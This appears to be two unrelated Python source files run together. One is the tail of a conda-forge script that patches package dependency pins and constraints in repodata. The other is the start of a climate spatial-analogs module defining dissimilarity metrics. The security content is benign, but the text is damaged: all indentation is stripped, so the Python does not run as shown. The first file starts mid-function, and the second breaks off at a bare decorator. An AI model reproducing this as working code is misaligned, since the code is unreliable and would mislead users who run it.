record['depends'].append("typing_extensions")
else:
record['depends'] = ["typing_extensions"]
if record_name == "ipython" and record.get('timestamp', 0) < 1609621539000:
# https://github.com/conda-forge/ipython-feedstock/issues/127
if any(dep.split(' ')[0] == "jedi" for dep in record.get('depends', ())):
record['depends'].append('jedi <0.18')
if record_name == "kartothek" and record.get('timestamp', 0) < 1611565264000:
# https://github.com/conda-forge/kartothek-feedstock/issues/36
if "zstandard" in record['depends']:
i = record['depends'].index('zstandard')
record['depends'][i] = 'zstandard <0.15'
if record_name == "gitdb" and record['version'].startswith('4.0.') and 'smmap >=3.0.1' in record['depends']:
i = record['depends'].index('smmap >=3.0.1')
record['depends'][i] = 'smmap >=3.0.1,<4'
if record_name == "arrow-cpp":
if not any(dep.split(' ')[0] == "arrow-cpp-proc" for dep in record.get('constrains', ())):
if 'constrains' in record:
record['constrains'].append("arrow-cpp-proc * cpu")
else:
record['constrains'] = ["arrow-cpp-proc * cpu"]
if "aws-sdk-cpp" in record['depends']:
i = record['depends'].index('aws-sdk-cpp')
record['depends'][i] = 'aws-sdk-cpp 1.7.164'
if record_name == "pyarrow":
if not any(dep.split(' ')[0] == "arrow-cpp-proc" for dep in record.get('constrains', ())):
if 'constrains' in record:
record['constrains'].append("arrow-cpp-proc * cpu")
else:
record['constrains'] = ["arrow-cpp-proc * cpu"]
if record_name == "kartothek":
if record["version"] in ["3.15.0", "3.15.1", "3.16.0"] \
and "pyarrow >=0.13.0,!=0.14.0,<2" in record["depends"]:
i = record["depends"].index("pyarrow >=0.13.0,!=0.14.0,<2")
record["depends"][i] = "pyarrow >=0.17.1,<2"
# distributed <2.11.0 does not work with msgpack-python >=1.0
# newer versions of distributed require at least msgpack-python >=0.6.0
# so we can fix cases where msgpack-python is unbounded
# https://github.com/conda-forge/distributed-feedstock/pull/114
if record_name == 'distributed':
if 'msgpack-python' in record['depends']:
i = record['depends'].index('msgpack-python')
record['depends'][i] = 'msgpack-python <1.0.0'
# python-language-server <=0.31.9 requires pyflakes <2.2.2
# included explicitly in 0.31.10+
# https://github.com/conda-forge/python-language-server-feedstock/pull/50
version = record['version']
if record_name == 'python-language-server':
pversion = pkg_resources.parse_version(version)
v0_31_9 = pkg_resources.parse_version('0.31.9')
if pversion <= v0_31_9 and 'pyflakes >=1.6.0' in record['depends']:
i = record['depends'].index('pyflakes >=1.6.0')
record['depends'][i] = 'pyflakes >=1.6.0,<2.2.0'
# aioftp >=0.17.0 requires python >=3.7
# aioftp 0.17.x was incorrectly built with 3.6 support
# https://github.com/conda-forge/aioftp-feedstock/pull/12
version = record['version']
if record_name == 'aioftp':
pversion = pkg_resources.parse_version(version)
base_version = pkg_resources.parse_version('0.17.0')
max_version = pkg_resources.parse_version('0.17.2')
if base_version <= pversion <= max_version and 'python >=3.6' in record['depends']:
i = record['depends'].index('python >=3.6')
record['depends'][i] = 'python >=3.7'
# numpydoc >=1.0.0 requires python >=3.5
# https://github.com/conda-forge/numpydoc-feedstock/pull/14
version = record['version']
if record_name == 'numpydoc':
pversion = pkg_resources.parse_version(version)
v1_0_0 = pkg_resources.parse_version('1.0.0')
v1_1_0 = pkg_resources.parse_version('1.1.0')
if v1_0_0 <= pversion <= v1_1_0 and 'python' in record['depends']:
i = record['depends'].index('python')
record['depends'][i] = 'python >=3.5'
# pip >=21 requires python >=3.6 but the first build has >=3
# https://github.com/conda-forge/pip-feedstock/pull/68
if record_name == 'pip':
if record['version'] == "21.0" and record['build'] == "pyhd8ed1ab_0":
i = record['depends'].index('python >=3')
record['depends'][i] = 'python >=3.6'
# fix deps with wrong names
if record_name in proj4_fixes:
_rename_dependency(fn, record, "proj.4", "proj4")
if record_name == "airflow-with-async":
_rename_dependency(fn, record, "evenlet", "eventlet")
if record_name == "iris":
_rename_dependency(fn, record, "nc_time_axis", "nc-time-axis")
if (record_name == "r-base" and
not any(dep.startswith("_r-mutex ")
for dep in record["depends"])):
depends = record["depends"]
depends.append("_r-mutex 1.* anacondar_1")
record["depends"] = depends
if record_name == "gcc_impl_{}".format(subdir):
_relax_exact(fn, record, "binutils_impl_{}".format(subdir))
deps = record.get("depends", ())
if "ntl" in deps and record_name != "sage":
_rename_dependency(fn, record, "ntl", "ntl 10.3.0")
if "libiconv >=1.15,<1.16.0a0" in deps:
_pin_looser(fn, record, "libiconv", upper_bound="1.17.0")
if 're2' in deps and record.get('timestamp', 0) < 1588349339243:
_rename_dependency(fn, record, "re2", "re2 <2020.05.01")
if 'libffi' in deps and record.get('timestamp', 0) < 1605980936031:
_rename_dependency(fn, record, "libffi", "libffi <3.3.0.a0")
if 'libffi >=3.2.1,<4.0a0' in deps and record.get('timestamp', 0) < 1605980936031:
_pin_stricter(fn, record, "libffi", "x.x")
_relax_libssh2_1_x_pinning(fn, record)
if any(dep.startswith("gf2x") for dep in deps):
_pin_stricter(fn, record, "gf2x", "x.x")
if any(dep.startswith("libnetcdf >=4.7.3") for dep in deps):
_pin_stricter(fn, record, "libnetcdf", "x.x.x.x")
if any(dep.startswith("libarchive >=3.3") for dep in deps):
_pin_looser(fn, record, "libarchive", upper_bound="3.6.0")
# fix only packages built before the run_exports was corrected.
if any(dep == "libflang" or dep.startswith("libflang >=5.0.0") for dep in deps) and record.get('timestamp', 0) < 1611789153000:
record["depends"].append("libflang <6.0.0.a0")
if any(dep.startswith("libignition-") or dep == 'libsdformat' for dep in deps):
for dep_idx, _ in enumerate(deps):
dep = record['depends'][dep_idx]
if dep.startswith('libignition-'):
_pin_looser(fn, record, dep.split(" ")[0], max_pin="x")
if dep.startswith('libsdformat '):
_pin_looser(fn, record, dep.split(" ")[0], max_pin="x")
# this doesn't seem to match the _pin_looser or _pin_stricter patterns
# nor _replace_pin
if record_name == "jedi" and record.get("timestamp", 0) < 1592619891258:
for i, dep in enumerate(record["depends"]):
if dep.startswith("parso") and "<" not in dep:
_dep_parts = dep.split(" ")
_dep_parts[1] = _dep_parts[1] + ",<0.8.0"
record["depends"][i] = " ".join(_dep_parts)
# FIXME: disable patching-out blas_openblas feature
# because hotfixes are not applied to gcc7 label
# causing inconsistent behavior
# if (record_name == "blas" and
# record["track_features"] == "blas_openblas"):
# instructions["packages"][fn]["track_features"] = None
# if "features" in record:
# if "blas_openblas" in record["features"]:
# # remove blas_openblas feature
# instructions["packages"][fn]["features"] = _extract_feature(
# record, "blas_openblas")
# if not any(d.startswith("blas ") for d in record["depends"]):
# depends = record['depends']
# depends.append("blas 1.* openblas")
# instructions["packages"][fn]["depends"] = depends
if any(dep.startswith("zstd >=1.4") for dep in deps):
_pin_looser(fn, record, "zstd", max_pin="x.x")
# We pin MPI packages loosely so as to rely on their ABI compatibility
if any(dep.startswith("openmpi >=4.0") for dep in deps):
_pin_looser(fn, record, "openmpi", upper_bound="5.0")
if any(dep.startswith("mpich >=3.3") for dep in deps):
_pin_looser(fn, record, "mpich", upper_bound="4.0")
_replace_pin('libunwind >=1.2.1,<1.3.0a0', 'libunwind >=1.2.1,<2.0.0a0', deps, record)
_replace_pin('snappy >=1.1.7,<1.1.8.0a0', 'snappy >=1.1.7,<2.0.0.0a0', deps, record)
_replace_pin('ncurses >=6.1,<6.2.0a0', 'ncurses >=6.1,<6.3.0a0', deps, record)
_replace_pin('abseil-cpp', 'abseil-cpp =20190808', deps, record)
if record_name not in ["blas", "libblas", "libcblas", "liblapack",
"liblapacke", "lapack", "blas-devel"]:
_replace_pin('liblapack >=3.8.0,<3.9.0a0', 'liblapack >=3.8.0,<4.0.0a0', deps, record)
_replace_pin('liblapacke >=3.8.0,<3.9.0a0', 'liblapacke >=3.8.0,<4.0.0a0', deps, record)
# Filter by timestamp as pythia8 also contains python bindings that shouldn't be pinned
if 'pythia8' in deps and record.get('timestamp', 0) < 1584264455759:
i = record['depends'].index('pythia8')
record['depends'][i] = 'pythia8 >=8.240,<8.300.0a0'
# remove features for openjdk and rb2
if ("track_features" in record and
record['track_features'] is not None):
for feat in record["track_features"].split():
if feat.startswith(("rb2", "openjdk")):
record["track_features"] = _extract_track_feature(
record, feat)
llvm_pkgs = ["libclang", "clang", "clang-tools", "llvm", "llvm-tools", "llvmdev"]
for llvm in ["libllvm8", "libllvm9"]:
if any(dep.startswith(llvm) for dep in deps):
if record_name not in llvm_pkgs:
_relax_exact(fn, record, llvm, max_pin="x.x")
else:
_relax_exact(fn, record, llvm, max_pin="x.x.x")
if record_name in llvm_pkgs:
new_constrains = record.get('constrains', [])
version = record["version"]
for pkg in llvm_pkgs:
if record_name == pkg:
continue
if pkg in new_constrains:
del new_constrains[pkg]
if any(constraint.startswith(f"{pkg} ") for constraint in new_constrains):
continue
new_constrains.append(f'{pkg} {version}.*')
record['constrains'] = new_constrains
# make sure the libgfortran version is bound from 3 to 4 for osx
if subdir == "osx-64":
_fix_libgfortran(fn, record)
_fix_libcxx(fn, record)
full_pkg_name = fn.replace('.tar.bz2', '')
if full_pkg_name in OSX_SDK_FIXES:
_set_osx_virt_min(fn, record, OSX_SDK_FIXES[full_pkg_name])
# make old binutils packages conflict with the new sysroot packages
# that have renamed the sysroot from conda_cos6 or conda_cos7 to just
# conda
if (
subdir in ["linux-64", "linux-aarch64", "linux-ppc64le"]
and record_name in [
"binutils", "binutils_impl_" + subdir, "ld_impl_" + subdir]
and record.get('timestamp', 0) < 1589953178153 # 2020-05-20
):
new_constrains = record.get('constrains', [])
new_constrains.append("sysroot_" + subdir + " ==99999999999")
record["constrains"] = new_constrains
# make sure the old compilers conflict with the new sysroot packages
# and they only use libraries from the old compilers
if (
subdir in ["linux-64", "linux-aarch64", "linux-ppc64le"]
and record_name in [
"gcc_impl_" + subdir, "gxx_impl_" + subdir, "gfortran_impl_" + subdir]
and record['version'] in ['5.4.0', '7.2.0', '7.3.0', '8.2.0']
):
new_constrains = record.get('constrains', [])
for pkg in ["libgcc-ng", "libstdcxx-ng", "libgfortran", "libgomp"]:
new_constrains.append("{} 5.4.*|7.2.*|7.3.*|8.2.*|9.1.*|9.2.*".format(pkg))
new_constrains.append("binutils_impl_" + subdir + " <2.34")
new_constrains.append("ld_impl_" + subdir + " <2.34")
new_constrains.append("sysroot_" + subdir + " ==99999999999")
record["constrains"] = new_constrains
# we pushed a few builds of the compilers past the list of versions
# above which do not use the sysroot packages - this block catches those
# it will also break some test builds of the new compilers but we should
# not be using those anyways and they are marked as broken.
if (
subdir in ["linux-64", "linux-aarch64", "linux-ppc64le"]
and record_name in [
"gcc_impl_" + subdir, "gxx_impl_" + subdir, "gfortran_impl_" + subdir]
and record['version'] not in ['5.4.0', '7.2.0', '7.3.0', '8.2.0']
and not any(__r.startswith("sysroot_") for __r in record.get("depends", []))
):
new_constrains = record.get('constrains', [])
new_constrains.append("sysroot_" + subdir + " ==99999999999")
record["constrains"] = new_constrains
# all ctng activation packages that don't depend on the sysroot_*
# packages are not compatible with the new sysroot_*-based compilers
# root and cling must also be included as they have a builtin C++ interpreter
if (
subdir in ["linux-64", "linux-aarch64", "linux-ppc64le"]
and record_name in [
"gcc_" + subdir, "gxx_" + subdir, "gfortran_" + subdir,
"binutils_" + subdir, "gcc_bootstrap_" + subdir, "root_base", "cling"]
and not any(__r.startswith("sysroot_") for __r in record.get("depends", []))
):
new_constrains = record.get('constrains', [])
new_constrains.append("sysroot_" + subdir + " ==99999999999")
record["constrains"] = new_constrains
# old CDTs with the conda_cos6 or conda_cos7 name in the sysroot need to
# conflict with the new CDT and compiler packages
# all of the new CDTs and compilers depend on the sysroot_{subdir} packages
# so we use a constraint on those
if (
subdir == "noarch"
and (
record_name.endswith("-cos6-x86_64") or
record_name.endswith("-cos7-x86_64") or
record_name.endswith("-cos7-aarch64") or
record_name.endswith("-cos7-ppc64le")
)
and not record_name.startswith("sysroot-")
and not any(__r.startswith("sysroot_") for __r in record.get("depends", []))
):
if record_name.endswith("x86_64"):
sys_subdir = "linux-64"
elif record_name.endswith("aarch64"):
sys_subdir = "linux-aarch64"
elif record_name.endswith("ppc64le"):
sys_subdir = "linux-ppc64le"
new_constrains = record.get('constrains', [])
if not any(__r.startswith("sysroot_") for __r in new_constrains):
new_constrains.append("sysroot_" + sys_subdir + " ==99999999999")
record["constrains"] = new_constrains
# make sure pybind11 and pybind11-global have run constraints on
# the abi metapackage
# see https://github.com/conda-forge/conda-forge-repodata-patches-feedstock/issues/104 # noqa
if (
record_name in ["pybind11", "pybind11-global"]
# this version has a constraint sometimes
and (
pkg_resources.parse_version(record["version"])
<= pkg_resources.parse_version("2.6.1")
)
and not any(
c.startswith("pybind11-abi ")
for c in record.get("constrains", [])
)
):
_add_pybind11_abi_constraint(fn, record)
# add *lal>=7.1.1 as run_constrained for liblal-7.1.1
if (
record_name == "liblal"
and record['version'] == "7.1.1"
and record['build_number'] in (0, 1, 2, 100, 101, 102)
):
record.setdefault('constrains', []).extend((
"lal >=7.1.1",
"python-lal >=7.1.1",
))
return index
def _add_pybind11_abi_constraint(fn, record):
"""the pybind11-abi package uses the internals version
here are the ranges
v2.2.0 1
v2.2.1 1
v2.2.2 1
v2.2.3 1
v2.2.4 2
v2.3.0 3
v2.4.0 3
v2.4.1 3
v2.4.2 3
v2.4.3 3
v2.5.0 4
v2.6.0 4
v2.6.0b1 4
v2.6.0rc1 4
v2.6.0rc2 4
v2.6.0rc3 4
v2.6.1 4
prior to 2.2.0 we set it to 0
"""
ver = pkg_resources.parse_version(record["version"])
if ver < pkg_resources.parse_version("2.2.0"):
abi_ver = "0"
elif ver < pkg_resources.parse_version("2.2.4"):
abi_ver = "1"
elif ver < pkg_resources.parse_version("2.3.0"):
abi_ver = "2"
elif ver < pkg_resources.parse_version("2.5.0"):
abi_ver = "3"
elif ver <= pkg_resources.parse_version("2.6.1"):
abi_ver = "4"
else:
# past this we should have a constrains there already
raise RuntimeError(
"pybind11 version %s out of range for abi" % record["version"]
)
constrains = record.get("constrains", [])
found_idx = None
for idx in range(len(constrains)):
if constrains[idx].startswith("pybind11-abi "):
found_idx = idx
if found_idx is None:
constrains.append("pybind11-abi ==" + abi_ver)
else:
constrains[found_idx] = "pybind11-abi ==" + abi_ver
record["constrains"] = constrains
def _replace_pin(old_pin, new_pin, deps, record):
"""Replace an exact pin with a new one."""
if old_pin in deps:
i = record['depends'].index(old_pin)
record['depends'][i] = new_pin
def _rename_dependency(fn, record, old_name, new_name):
depends = record["depends"]
dep_idx = next(
(q for q, dep in enumerate(depends)
if dep.split(' ')[0] == old_name),
None
)
if dep_idx is not None:
parts = depends[dep_idx].split(" ")
remainder = (" " + " ".join(parts[1:])) if len(parts) > 1 else ""
depends[dep_idx] = new_name + remainder
record['depends'] = depends
def _fix_libgfortran(fn, record):
depends = record.get("depends", ())
dep_idx = next(
(q for q, dep in enumerate(depends)
if dep.split(' ')[0] == "libgfortran"),
None
)
if dep_idx is not None:
# make sure respect minimum versions still there
# 'libgfortran' -> >=3.0.1,<4.0.0.a0
# 'libgfortran ==3.0.1' -> ==3.0.1
# 'libgfortran >=3.0' -> >=3.0,<4.0.0.a0
# 'libgfortran >=3.0.1' -> >=3.0.1,<4.0.0.a0
if ("==" in depends[dep_idx]) or ("<" in depends[dep_idx]):
pass
elif depends[dep_idx] == "libgfortran":
depends[dep_idx] = "libgfortran >=3.0.1,<4.0.0.a0"
record['depends'] = depends
elif ">=3.0.1" in depends[dep_idx]:
depends[dep_idx] = "libgfortran >=3.0.1,<4.0.0.a0"
record['depends'] = depends
elif ">=3.0" in depends[dep_idx]:
depends[dep_idx] = "libgfortran >=3.0,<4.0.0.a0"
record['depends'] = depends
elif ">=4" in depends[dep_idx]:
# catches all of 4.*
depends[dep_idx] = "libgfortran >=4.0.0,<5.0.0.a0"
record['depends'] = depends
def _set_osx_virt_min(fn, record, min_vers):
rconst = record.get("constrains", ())
dep_idx = next(
(q for q, dep in enumerate(rconst)
if dep.split(' ')[0] == "__osx"),
None
)
run_constrained = list(rconst)
if dep_idx is None:
run_constrained.append("__osx >=%s" % min_vers)
if run_constrained:
record['constrains'] = run_constrained
def _fix_libcxx(fn, record):
record_name = record["name"]
if not record_name in ["cctools", "ld64", "llvm-lto-tapi"]:
return
depends = record.get("depends", ())
dep_idx = next(
(q for q, dep in enumerate(depends)
if dep.split(' ')[0] == "libcxx"),
None
)
if dep_idx is not None:
dep_parts = depends[dep_idx].split(" ")
if len(dep_parts) >= 2 and dep_parts[1] == "4.0.1":
# catches all of 4.*
depends[dep_idx] = "libcxx >=4.0.1"
record['depends'] = depends
def pad_list(l, num):
if len(l) >= num:
return l
return l + ["0"]*(num - len(l))
def get_upper_bound(version, max_pin):
num_x = max_pin.count("x")
ver = pad_list(version.split("."), num_x)
ver[num_x:] = ["0"]*(len(ver)-num_x)
ver[num_x-1] = str(int(ver[num_x-1])+1)
return ".".join(ver)
def _relax_exact(fn, record, fix_dep, max_pin=None):
depends = record.get("depends", ())
dep_idx = next(
(q for q, dep in enumerate(depends)
if dep.split(' ')[0] == fix_dep),
None
)
if dep_idx is not None:
dep_parts = depends[dep_idx].split(" ")
if (len(dep_parts) == 3 and \
not any(dep_parts[1].startswith(op) for op in OPERATORS)):
if max_pin is not None:
upper_bound = get_upper_bound(dep_parts[1], max_pin) + "a0"
depends[dep_idx] = "{} >={},<{}".format(*dep_parts[:2], upper_bound)
else:
depends[dep_idx] = "{} >={}".format(*dep_parts[:2])
record['depends'] = depends
def _match_strict_libssh2_1_x_pin(dep):
if dep.startswith("libssh2 >=1.8.0,<1.9.0a0"):
return True
if dep.startswith("libssh2 >=1.8.1,<1.9.0a0"):
return True
if dep.startswith("libssh2 >=1.8.2,<1.9.0a0"):
return True
if dep.startswith("libssh2 1.8.*"):
return True
return False
def _relax_libssh2_1_x_pinning(fn, record):
depends = record.get("depends", ())
dep_idx = next(
(q for q, dep in enumerate(depends)
if _match_strict_libssh2_1_x_pin(dep)),
None
)
if dep_idx is not None:
depends[dep_idx] = "libssh2 >=1.8.0,<2.0.0a0"
cb_pin_regex = re.compile(r"^>=(?P<lower>\d(\.\d+)*a?),<(?P<upper>\d(\.\d+)*)a0$")
def _pin_stricter(fn, record, fix_dep, max_pin):
depends = record.get("depends", ())
dep_indices = [q for q, dep in enumerate(depends) if dep.split(' ')[0] == fix_dep]
for dep_idx in dep_indices:
dep_parts = depends[dep_idx].split(" ")
if len(dep_parts) not in [2, 3]:
continue
m = cb_pin_regex.match(dep_parts[1])
if m is None:
continue
lower = m.group("lower")
upper = m.group("upper").split(".")
new_upper = get_upper_bound(lower, max_pin).split(".")
upper = pad_list(upper, len(new_upper))
new_upper = pad_list(new_upper, len(upper))
if tuple(upper) > tuple(new_upper):
if str(new_upper[-1]) != "0":
new_upper += ["0"]
depends[dep_idx] = "{} >={},<{}a0".format(dep_parts[0], lower, ".".join(new_upper))
if len(dep_parts) == 3:
depends[dep_idx] = "{} {}".format(depends[dep_idx], dep_parts[2])
record['depends'] = depends
def _pin_looser(fn, record, fix_dep, max_pin=None, upper_bound=None):
depends = record.get("depends", ())
dep_indices = [q for q, dep in enumerate(depends) if dep.split(' ')[0] == fix_dep]
for dep_idx in dep_indices:
dep_parts = depends[dep_idx].split(" ")
if len(dep_parts) not in [2, 3]:
continue
m = cb_pin_regex.match(dep_parts[1])
if m is None:
continue
lower = m.group("lower")
upper = m.group("upper").split(".")
if upper_bound is None:
new_upper = get_upper_bound(lower, max_pin).split(".")
else:
new_upper = upper_bound.split(".")
upper = pad_list(upper, len(new_upper))
new_upper = pad_list(new_upper, len(upper))
if tuple(upper) < tuple(new_upper):
if str(new_upper[-1]) != "0":
new_upper += ["0"]
depends[dep_idx] = "{} >={},<{}a0".format(dep_parts[0], lower, ".".join(new_upper))
if len(dep_parts) == 3:
depends[dep_idx] = "{} {}".format(depends[dep_idx], dep_parts[2])
record['depends'] = depends
def _extract_and_remove_vc_feature(record):
features = record.get('features', '').split()
vc_features = tuple(f for f in features if f.startswith('vc'))
if not vc_features:
return None
non_vc_features = tuple(f for f in features if f not in vc_features)
vc_version = int(vc_features[0][2:]) # throw away all but the first
if non_vc_features:
record['features'] = ' '.join(non_vc_features)
else:
record['features'] = None
return vc_version
def _extract_feature(record, feature_name):
features = record.get('features', '').split()
features.remove(feature_name)
return " ".join(features) or None
def _extract_track_feature(record, feature_name):
features = record.get('track_features', '').split()
features.remove(feature_name)
return " ".join(features) or None
def main():
# Step 1. Collect initial repodata for all subdirs.
repodatas = {}
if "CF_SUBDIR" in os.environ:
# For local debugging
subdirs = os.environ["CF_SUBDIR"].split(";")
else:
subdirs = SUBDIRS
for subdir in tqdm.tqdm(subdirs, desc="Downloading repodata"):
repodata_url = "/".join(
(CHANNEL_ALIAS, CHANNEL_NAME, subdir, "repodata_from_packages.json"))
response = requests.get(repodata_url)
response.raise_for_status()
repodatas[subdir] = response.json()
# Step 2. Create all patch instructions.
prefix_dir = os.getenv("PREFIX", "tmp")
for subdir in subdirs:
prefix_subdir = join(prefix_dir, subdir)
if not isdir(prefix_subdir):
os.makedirs(prefix_subdir)
# Step 2a. Generate a new index.
new_index = _gen_new_index(repodatas[subdir], subdir)
# Step 2b. Generate the instructions by diff'ing the indices.
instructions = _gen_patch_instructions(
repodatas[subdir]['packages'], new_index, subdir)
# Step 2c. Output this to $PREFIX so that we bundle the JSON files.
patch_instructions_path = join(
prefix_subdir, "patch_instructions.json")
with open(patch_instructions_path, 'w') as fh:
json.dump(
instructions, fh, indent=2,
sort_keys=True, separators=(',', ': '))
if __name__ == "__main__":
sys.exit(main())
|
# -*- encoding: utf8 -*-
# noqa: D205,D400
"""
Spatial analogs
===============
Spatial analogues are maps showing which areas have a present-day climate that is analogous
to the future climate of a given place. This type of map can be useful for climate adaptation
to see how well regions are coping today under specific climate conditions. For example,
officials from a city located in a temperate region that may be expecting more heatwaves in
the future can learn from the experience of another city where heatwaves are a common occurrence,
leading to more proactive intervention plans to better deal with new climate conditions.
Spatial analogues are estimated by comparing the distribution of climate indices computed at
the target location over the future period with the distribution of the same climate indices
computed over a reference period for multiple candidate regions. A number of methodological
choices thus enter the computation:
- Climate indices of interest,
- Metrics measuring the difference between both distributions,
- Reference data from which to compute the base indices,
- A future climate scenario to compute the target indices.
The climate indices chosen to compute the spatial analogues are usually annual values of
indices relevant to the intended audience of these maps. For example, in the case of the
wine grape industry, the climate indices examined could include the length of the frost-free
season, growing degree-days, annual winter minimum temperature andand annual number of
very cold days [Roy2017]_.
Methods to compute the (dis)similarity between samples
------------------------------------------------------
This module implements five of the six methods described in [Grenier2013]_ to measure
the dissimilarity between two samples. Some of these algorithms can be used to
test whether or not two samples have been drawn from the same distribution.
Here, they are used to find areas with analog climate conditions to a target
climate.
Methods available
~~~~~~~~~~~~~~~~~
* Standardized Euclidean distance
* Nearest Neighbour distance
* Zech-Aslan energy statistic
* Friedman-Rafsky runs statistic
* Kolmogorov-Smirnov statistic
* Kullback-Leibler divergence
All methods accept arrays, the first is the reference (n, D) and
the second is the candidate (m, D). Where the climate indicators
vary along D and the distribution dimension along n or m. All methods output
a single float.
.. rubric:: References
.. [Roy2017] Roy, P., Grenier, P., Barriault, E. et al. Climatic Change (2017) 143: 43. `<doi:10.1007/s10584-017-1960-x>`_
.. [Grenier2013] Grenier, P., A.-C. Parent, D. Huard, F. Anctil, and D. Chaumont, 2013: An assessment of six dissimilarity metrics for climate analogs. J. Appl. Meteor. Climatol., 52, 733–752, `<doi:10.1175/JAMC-D-12-0170.1>`_
"""
# Code adapted from flyingpigeon.dissimilarity, Nov 2020.
from typing import Sequence, Tuple, Union
import numpy as np
import xarray as xr
from boltons.funcutils import wraps
from pkg_resources import parse_version
from scipy import __version__ as __scipy_version__
from scipy import spatial
from scipy.spatial import cKDTree as KDTree
# TODO: Szekely, G, Rizzo, M (2014) Energy statistics: A class of statistics
# based on distances. J Stat Planning & Inference 143: 1249-1272
# TODO: Hellinger distance
metrics = dict()
def spatial_analogs(
target: xr.Dataset,
candidates: xr.Dataset,
dist_dim: Union[str, Sequence[str]] = "time",
method: str = "kldiv",
**kwargs,
):
"""Compute dissimilarity statistics between target points and candidate points.
Spatial analogs based on the comparison of climate indices. The algorithm compares
the distribution of the reference indices with the distribution of spatially
distributed candidate indices and returns a value measuring the dissimilarity
between both distributions over the candidate grid.
Parameters
----------
target : xr.Dataset
Dataset of the target indices. Only indice variables should be included in the
dataset's `data_vars`. They should have only the dimension(s) `dist_dim `in common with `candidates`.
candidates : xr.Dataset
Dataset of the candidate indices. Only indice variables should be included in
the dataset's `data_vars`.
dist_dim : str
The dimension over which the *distributions* are constructed. This can be a multi-index dimension.
method : {'seuclidean', 'nearest_neighbor', 'zech_aslan', 'kolmogorov_smirnov', 'friedman_rafsky', 'kldiv'}
Which method to use when computing the dissimilarity statistic.
**kwargs
Any other parameter passed directly to the dissimilarity method.
Returns
-------
xr.DataArray
The dissimilarity statistic over the union of candidates' and target's dimensions.
"""
if parse_version(__scipy_version__) < parse_version("1.6.0") and method in [
"kldiv",
"nearest_neighbor",
]:
raise RuntimeError(f"Spatial analog method ({method}) requires scipy>=1.6.0.")
# Create the target DataArray:
target = xr.concat(
target.data_vars.values(),
xr.DataArray(list(target.data_vars.keys()), dims=("indices",), name="indices"),
)
# Create the target DataArray with different dist_dim
c_dist_dim = "candidate_dist_dim"
candidates = xr.concat(
candidates.data_vars.values(),
xr.DataArray(
list(candidates.data_vars.keys()),
dims=("indices",),
name="indices",
),
).rename({dist_dim: c_dist_dim})
try:
metric = metrics[method]
except KeyError:
raise ValueError(
f"Method {method} is not implemented. Available methods are : {",".join(metrics.keys())}."
)
# Compute dissimilarity
diss = xr.apply_ufunc(
metric,
target,
candidates,
input_core_dims=[(dist_dim, "indices"), (c_dist_dim, "indices")],
output_core_dims=[()],
vectorize=True,
dask="parallelized",
output_dtypes=[float],
**kwargs,
)
diss.name = "dissimilarity"
diss.attrs.update(
long_name=f"Dissimilarity between target and candidates, using metric {method}.",
indices=",".join(target.indices.values),
metric=method,
)
return diss
# ---------------------------------------------------------------------------- #
# -------------------------- Utility functions ------------------------------- #
# ---------------------------------------------------------------------------- #
def standardize(x: np.ndarray, y: np.ndarray) -> Tuple[np.ndarray, np.ndarray]:
"""
Standardize x and y by the square root of the product of their standard deviation.
Parameters
----------
x: np.ndarray
Array to be compared.
y: np.ndarray
Array to be compared.
Returns
-------
(ndarray, ndarray)
Standardized arrays.
"""
s = np.sqrt(x.std(0, ddof=1) * y.std(0, ddof=1))
return x / s, y / s
def metric(func):
"""Register a metric function in the `metrics` mapping and add some preparation/checking code.
All metric functions accept 2D inputs. This reshape 1D inputs to (n, 1) and (m, 1).
All metric functions are invalid when any non-finite values are present in the inputs.
"""
@wraps(func)
def _metric_overhead(x, y, **kwargs):
if np.any(np.isnan(x)) or np.any(np.isnan(y)):
return np.NaN
x = np.atleast_2d(x)
y = np.atleast_2d(y)
# If array is 1D, flip it.
if x.shape[0] == 1:
x = x.T
if y.shape[0] == 1:
y = y.T
if x.shape[1] != y.shape[1]:
raise AttributeError("Shape mismatch")
return func(x, y, **kwargs)
metrics[func.__name__] = _metric_overhead
return _metric_overhead
# ---------------------------------------------------------------------------- #
# ------------------------ Dissimilarity metrics ----------------------------- #
# ---------------------------------------------------------------------------- #
@metric
def seuclidean(x: np.ndarray, y: np.ndarray) -> float:
"""
Compute the Euclidean distance between the mean of a multivariate candidate sample with respect to the mean of a reference sample.
Parameters
----------
x : np.ndarray (n,d)
Reference sample.
y : np.ndarray (m,d)
Candidate sample.
Returns
-------
float
Standardized Euclidean Distance between the mean of the samples
ranging from 0 to infinity.
Notes
-----
This metric considers neither the information from individual points nor
the standard deviation of the candidate distribution.
References
----------
Veloz et al. (2011) Identifying climatic analogs for Wisconsin under
21st-century climate-change scenarios. Climatic Change,
DOI 10.1007/s10584-011-0261-z.
"""
mx = x.mean(axis=0)
my = y.mean(axis=0)
return spatial.distance.seuclidean(mx, my, x.var(axis=0, ddof=1))
@metric
def nearest_neighbor(x: np.ndarray, y: np.ndarray) -> np.ndarray:
"""
Compute a dissimilarity metric based on the number of points in the pooled sample whose nearest neighbor belongs to the same distribution.
Parameters
----------
x : np.ndarray (n,d)
Reference sample.
y : np.ndarray (m,d)
Candidate sample.
Returns
-------
float
Nearest-Neighbor dissimilarity metric ranging from 0 to 1.
References
----------
Henze N. (1988) A Multivariate two-sample test based on the number of
nearest neighbor type coincidences. Ann. of Stat., Vol. 16, No.2, 772-783.
"""
x, y = standardize(x, y)
nx, _ = x.shape
# Pool the samples and find the nearest neighbours
xy = np.vstack([x, y])
tree = KDTree(xy)
_, ind = tree.query(xy, k=2, eps=0, p=2, workers=2)
# Identify points whose neighbors are from the same sample
same = ~np.logical_xor(*(ind < nx).T)
return same.mean()
@metric
def zech_aslan(x: np.ndarray, y: np.ndarray) -> float:
"""
Compute the Zech-Aslan energy distance dissimimilarity metric based on an analogy with the energy of a cloud of electrical charges.
Parameters
----------
x : np.ndarray (n,d)
Reference sample.
y : np.ndarray (m,d)
Candidate sample.
Returns
-------
float
Zech-Aslan dissimilarity metric ranging from -infinity to infinity.
References
----------
Zech G. and Aslan B. (2003) A Multivariate two-sample test based on the
concept of minimum energy. PHYStat2003, SLAC, Stanford, CA, Sep 8-11.
Aslan B. and Zech G. (2008) A new class of binning-free, multivariate
goodness-of-fit tests: the energy tests. arXiV:hep-ex/0203010v5.
"""
nx, d = x.shape
ny, d = y.shape
v = (x.std(axis=0, ddof=1) * y.std(axis=0, ddof=1)).astype(np.double)
dx = spatial.distance.pdist(x, "seuclidean", V=v)
dy = spatial.distance.pdist(y, "seuclidean", V=v)
dxy = spatial.distance.cdist(x, y, "seuclidean", V=v)
phix = -np.log(dx).sum() / nx / (nx - 1)
phiy = -np.log(dy).sum() / ny / (ny - 1)
phixy = np.log(dxy).sum() / nx / ny
return phix + phiy + phixy
@metric
